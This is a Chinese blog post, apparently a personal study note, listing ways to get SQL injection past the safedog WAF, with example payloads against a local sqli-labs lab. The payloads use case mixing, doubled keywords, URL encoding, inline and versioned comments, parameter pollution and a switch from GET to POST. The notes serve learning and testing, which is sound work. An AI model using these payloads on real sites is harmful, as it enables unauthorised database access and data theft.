最近学习了SQL注入的绕过WAF的知识点,主要是以safedog为例,进行的学习,学习的知识框架总结如下:
主要是分为三个部分进行绕过,分别是从数据角度进行的绕过、从提交方式上进行的绕过以及从其他的方面进行的绕过,其他方面包括这FUZZ、根据数据库的特性、HTTP参数溢出等等。
(1)大小写绕过
http://sqllab.com/sqli-labs-master/Less-2/?id=-1 UNioN sEleCt 1,2,3--+(2) 关键字的替换
http://sqllab.com/sqli-labs-master/Less-2/?id=-1 uniunionon selselectect 1,2,3--+这里用到的是关键字的重复使用。
(3)编码和解码
?id=-1 union%0Aselect%0A1,2,3--+
?id=-1 %75nion select 1,2,3--+这里的%0A、%75分别代表着换行、u,以及我们还可以使用%23(代表着#)
(4)加密和解密
这里理解的加密和解密,在我个人的学习中,是这样认为的,存在许多的URL中的参数的值是经过了base64等加密,在进行的传参,因此我们在进行sql注入的时候,并不能将我们的正常使用的sql语句带入到参数中,直接进行查询,必须将我们的sql语句整个进行base64的加密,然后代入到参数中,进行一个查询。
(5) 内联注释
id=-1 union/**/select/**/1,2,3--+(6) 等价函数替换
hex()、bin()==>ascii()
concat_ws()==>group_concat()
mid()、substr()==>substring()
@@user()==>user()
@@datadir==>datadir()
@@version==>version()
(7)特殊符号
#(%23)、--+(注释符)、\\\\、'、@、+等,当然我们也可以将and替换为&&,以及or替换为||进行尝试绕过。
id=-1 union+select+1,2,3--+(8)内联注释加上!
http://sqllab.com/sqli-labs-master/Less-2/?id=-1 /*!union*/ select 1,2,3--+(9)HTTP参数污染
http://sqllab.com/sqli-labs-master/Less-2/?id=1&id=2在MYSQL中的参数污染的意思是:对于两个参数id,在接收的时候会接受第二个id中的值,这样我们就可在第二个id=2的后面写入SQL注入语句。
(10)提交方式
基于safedog中,默认是只过滤GET请求的,因此我们便可以通过修改提交方式,将其改为POST方式进行提交,尝试过滤WAF。
大家还可以参考这篇文章:WEB漏洞-SQL注入之SQLMAP绕过WAF_闭关不更新的博客-CSDN博客_sqlmap绕过waf注入
454
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
